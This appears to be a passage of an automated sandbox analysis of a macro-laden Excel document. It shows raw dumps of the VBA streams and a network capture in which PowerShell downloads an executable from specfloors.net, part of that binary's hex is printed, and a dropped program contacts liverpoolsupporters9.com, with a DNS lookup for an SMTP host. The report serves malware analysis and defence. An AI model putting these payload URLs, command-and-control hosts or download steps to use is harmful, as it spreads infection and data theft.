                                                Data Raw:49 44 3d 22 7b 44 31 41 36 30 33 34 36 2d 42 31 32 39 2d 34 41 44 36 2d 42 46 39 32 2d 38 34 45 46 41 39 43 33 39 42 30 32 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 56 42 41 50 72 6f 6a 65 63 74 22 0d 0a 48 65
                                                Stream Path: PROJECTwm, File Type: data, Stream Size: 62
                                                General
                                                Stream Path:PROJECTwm
                                                File Type:data
                                                Stream Size:62
                                                Entropy:3.05546715432
                                                Base64 Encoded:False
                                                Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . . .
                                                Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 00 00
                                                Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 2706
                                                General
                                                Stream Path:VBA/_VBA_PROJECT
                                                File Type:data
                                                Stream Size:2706
                                                Entropy:4.28368853699
                                                Base64 Encoded:False
                                                Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                                                Data Raw:cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 2525
                                                General
                                                Stream Path:VBA/__SRP_0
                                                File Type:data
                                                Stream Size:2525
                                                Entropy:3.32361225004
                                                Base64 Encoded:False
                                                Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ & . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . .
                                                Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 01 00 00 00 00 00 01 00 02 00 01 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 80 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00
                                                Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 283
                                                General
                                                Stream Path:VBA/__SRP_1
                                                File Type:data
                                                Stream Size:283
                                                Entropy:2.00632052806
                                                Base64 Encoded:False
                                                Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ v . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . C o d e K e y . . . . . . . . . . .
                                                Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 76 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 05 00 11 00 00 00 00 00
                                                Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 464
                                                General
                                                Stream Path:VBA/__SRP_2
                                                File Type:data
                                                Stream Size:464
                                                Entropy:1.56511880038
                                                Base64 Encoded:False
                                                Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 e1 03 00 00 00 00 00 00 00 00 00 00 11 08 00 00 00 00 00 00 00 00 00 00 41 08
                                                Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 106
                                                General
                                                Stream Path:VBA/__SRP_3
                                                File Type:data
                                                Stream Size:106
                                                Entropy:1.35911194617
                                                Base64 Encoded:False
                                                Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . b . . . . . . . . . . . . . . .
                                                Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 00 00 00 00 00 00 62 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00
                                                Stream Path: VBA/__SRP_4, File Type: data, Stream Size: 24047
                                                General
                                                Stream Path:VBA/__SRP_4
                                                File Type:data
                                                Stream Size:24047
                                                Entropy:3.39608832578
                                                Base64 Encoded:False
                                                Data ASCII:r U . . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . A . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                Data Raw:72 55 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 05 00 30 01 00 00 00 00 00 00 00 00 00 00 02 00 02 00 18 00 00 00 91 0c 00 00 00 00 00 00 00 00 00 00 61 0a 00 00 00 00 00 00 00 00 00 00 81 0a 00 00 00 00 00 00 00 00
                                                Stream Path: VBA/__SRP_5, File Type: data, Stream Size: 244
                                                General
                                                Stream Path:VBA/__SRP_5
                                                File Type:data
                                                Stream Size:244
                                                Entropy:2.1201357217
                                                Base64 Encoded:False
                                                Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . X . ! . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . Q . . . . . . . . . . . . . . . . . . . . . . . . . P . P . P . . . . . . . b . . . . . . . . . . . . . . .
                                                Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 04 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 38 00 e1 01 00 00 00 00 00 00 00 00 04 00 00 00 03 60 00 00 d9 08 38 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                                Stream Path: VBA/dir, File Type: data, Stream Size: 516
                                                General
                                                Stream Path:VBA/dir
                                                File Type:data
                                                Stream Size:516
                                                Entropy:6.28804288216
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . > . E b . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
                                                Data Raw:01 00 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 3e a4 45 62 06 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                Network Behavior

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Mar 22, 2021 15:36:08.971635103 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:09.110651970 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:09.110791922 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:09.113032103 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:09.564912081 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:09.669487953 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:09.678536892 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:09.679099083 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:09.679124117 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:09.679167986 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:09.679199934 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:09.679248095 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:09.679289103 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:09.679636002 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:09.679671049 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:09.679711103 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:09.679722071 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:09.679789066 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:09.679801941 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:09.679902077 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:10.183237076 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:10.183279991 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:10.183296919 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:10.183442116 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:10.183556080 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:10.183593988 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:10.183631897 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:10.183671951 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:10.183696985 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:10.183707952 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:10.183717012 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:10.184484959 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:10.184503078 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:10.184568882 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:10.737412930 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:10.737456083 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:10.737481117 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:10.737505913 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:10.737677097 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:10.737925053 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:10.737955093 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:10.737982988 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:10.738013029 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:10.738039970 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:10.738065004 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:10.738085032 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:10.738090038 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:10.738117933 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:10.738195896 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:10.953423977 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:11.191302061 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:11.191344976 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:11.191370964 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:11.191395044 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:11.191490889 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:11.191713095 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:11.191742897 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:11.191792011 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:11.191792011 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:11.191802979 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:11.191814899 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:11.191867113 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:11.191889048 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:11.192379951 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:11.192411900 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:11.192447901 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:11.192451954 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:11.192481041 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:11.192507982 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:11.192537069 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:11.192548990 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:11.193031073 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:11.193063021 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:11.193094969 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:11.193151951 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:11.193161011 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:11.193192959 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:11.193219900 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:11.193272114 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:11.675590992 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:11.675631046 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:11.675652981 CET8049165107.180.99.252192.168.2.22
                                                Mar 22, 2021 15:36:11.675692081 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:11.873914957 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:14.192353964 CET4916580192.168.2.22107.180.99.252
                                                Mar 22, 2021 15:36:18.690335035 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:18.741857052 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:18.741933107 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:18.743503094 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:18.794910908 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:18.961242914 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:18.961272001 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:18.961287975 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:18.961302996 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:18.961322069 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:18.961338997 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:18.961344004 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:18.961352110 CET8049167172.67.176.78192.168.2.22
                                                Mar 22, 2021 15:36:18.961357117 CET4916780192.168.2.22172.67.176.78
                                                Mar 22, 2021 15:36:18.961503029 CET4916780192.168.2.22172.67.176.78

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Mar 22, 2021 15:36:08.893560886 CET5219753192.168.2.228.8.8.8
                                                Mar 22, 2021 15:36:08.958956003 CET53521978.8.8.8192.168.2.22
                                                Mar 22, 2021 15:36:16.136372089 CET5309953192.168.2.228.8.8.8
                                                Mar 22, 2021 15:36:16.199054956 CET53530998.8.8.8192.168.2.22
                                                Mar 22, 2021 15:36:16.217905998 CET5283853192.168.2.228.8.8.8
                                                Mar 22, 2021 15:36:16.269005060 CET53528388.8.8.8192.168.2.22
                                                Mar 22, 2021 15:36:18.592609882 CET6120053192.168.2.228.8.8.8
                                                Mar 22, 2021 15:36:18.651133060 CET53612008.8.8.8192.168.2.22
                                                Mar 22, 2021 15:37:54.207794905 CET4954853192.168.2.228.8.8.8
                                                Mar 22, 2021 15:37:54.267529964 CET53495488.8.8.8192.168.2.22

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                Mar 22, 2021 15:36:08.893560886 CET192.168.2.228.8.8.80xa4ceStandard query (0)specfloors.netA (IP address)IN (0x0001)
                                                Mar 22, 2021 15:36:18.592609882 CET192.168.2.228.8.8.80x71ddStandard query (0)liverpoolsupporters9.comA (IP address)IN (0x0001)
                                                Mar 22, 2021 15:37:54.207794905 CET192.168.2.228.8.8.80x80acStandard query (0)smtp.jiratane.comA (IP address)IN (0x0001)

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                Mar 22, 2021 15:36:08.958956003 CET8.8.8.8192.168.2.220xa4ceNo error (0)specfloors.net107.180.99.252A (IP address)IN (0x0001)
                                                Mar 22, 2021 15:36:18.651133060 CET8.8.8.8192.168.2.220x71ddNo error (0)liverpoolsupporters9.com172.67.176.78A (IP address)IN (0x0001)
                                                Mar 22, 2021 15:36:18.651133060 CET8.8.8.8192.168.2.220x71ddNo error (0)liverpoolsupporters9.com104.21.88.100A (IP address)IN (0x0001)
                                                Mar 22, 2021 15:37:54.267529964 CET8.8.8.8192.168.2.220x80acNo error (0)smtp.jiratane.com198.54.116.63A (IP address)IN (0x0001)

                                                HTTP Request Dependency Graph

                                                • specfloors.net
                                                • liverpoolsupporters9.com

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                0192.168.2.2249165107.180.99.25280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                TimestampkBytes transferredDirectionData
                                                Mar 22, 2021 15:36:09.113032103 CET0OUTGET /dev/income.exe HTTP/1.1
                                                Host: specfloors.net
                                                Connection: Keep-Alive
                                                Mar 22, 2021 15:36:09.564912081 CET0OUTGET /dev/income.exe HTTP/1.1
                                                Host: specfloors.net
                                                Connection: Keep-Alive
                                                Mar 22, 2021 15:36:09.678536892 CET2INHTTP/1.1 200 OK
                                                Date: Mon, 22 Mar 2021 14:36:09 GMT
                                                Server: Apache
                                                Upgrade: h2,h2c
                                                Connection: Upgrade, Keep-Alive
                                                Last-Modified: Mon, 22 Mar 2021 11:02:01 GMT
                                                ETag: "1e1614-11068-5be1dfec2aa31"
                                                Accept-Ranges: bytes
                                                Content-Length: 69736
                                                Vary: Accept-Encoding,User-Agent
                                                Keep-Alive: timeout=5
                                                Content-Type: application/x-msdownload
                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9d 4e b7 9f 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 f2 00 00 00 08 00 00 00 00 00 00 4e 11 01 00 00 20 00 00 00 20 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 01 00 00 02 00 00 c4 f6 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 11 01 00 4b 00 00 00 00 20 01 00 f8 05 00 00 00 00 00 00 00 00 00 00 00 fc 00 00 68 14 00 00 00 40 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 f1 00 00 00 20 00 00 00 f2 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f8 05 00 00 00 20 01 00 00 06 00 00 00 f4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 01 00 00 02 00 00 00 fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 11 01 00 00 00 00 00 48 00 00 00 02 00 05 00 a4 73 00 00 5c 9d 00 00 03 00 00 00 0c 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 22 02 28 08 00 00 0a 00 2a 52 02 28 08 00 00 0a 00 00 02 73 09 00 00 0a 7d 02 00 00 04 2a 36 00 28 7e 00 00 06 6f 25 00 00 0a 00 2a 3e 00 02 72 c6 4c 00 70 03 6f 30 00 00 0a 00 2a 22 02 28 31 00 00 0a 00 2a 56 73 81 00 00 06 28 32 00 00 0a 74 05 00 00 02 80 03 00 00 04 2a 7e 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 2a c6 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 2a ae 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 2a de 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 2a f6 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 2a 00 00 00 13 30 01 00 d3 03 00 00 00 00 00 00 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a
                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELN"0N @ `@K h@ H.textT `.rsrc @@.reloc@@B0Hs\*"(*R(s}*6(~o%*>rLpo0*"(1*Vs(2t*~rpzrpzrpzrpzrpz*rpzrpzrpzrpzrpzrpzrpzrpz*rpzrpzrpzrpzrpzrpzrpz*rpzrpzrpzrpzrpzrpzrpzrpzrpz*rpzrpzrpzrpzrpzrpzrpzrpzrpzrpz*0rpzrpzrpzrpzrpzrpzrpzrpz


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                1192.168.2.2249167172.67.176.7880C:\Users\user\AppData\Roaming\tNDFx.exe
                                                TimestampkBytes transferredDirectionData
                                                Mar 22, 2021 15:36:18.743503094 CET136OUTGET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-6C294B0CA76FD09CC6E09D2031D8695F.html HTTP/1.1
                                                UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                Host: liverpoolsupporters9.com
                                                Connection: Keep-Alive
                                                Mar 22, 2021 15:36:18.961242914 CET138INHTTP/1.1 200 OK
                                                Date: Mon, 22 Mar 2021 14:36:18 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Set-Cookie: __cfduid=d56c6296392c8809ad61be780b11d1ccf1616423778; expires=Wed, 21-Apr-21 14:36:18 GMT; path=/; domain=.liverpoolsupporters9.com; HttpOnly; SameSite=Lax
                                                Last-Modified: Mon, 22 Mar 2021 09:37:24 GMT
                                                Vary: Accept-Encoding
                                                X-Frame-Options: SAMEORIGIN
                                                CF-Cache-Status: DYNAMIC
                                                cf-request-id: 08fbf691da0000076efd03b000000001
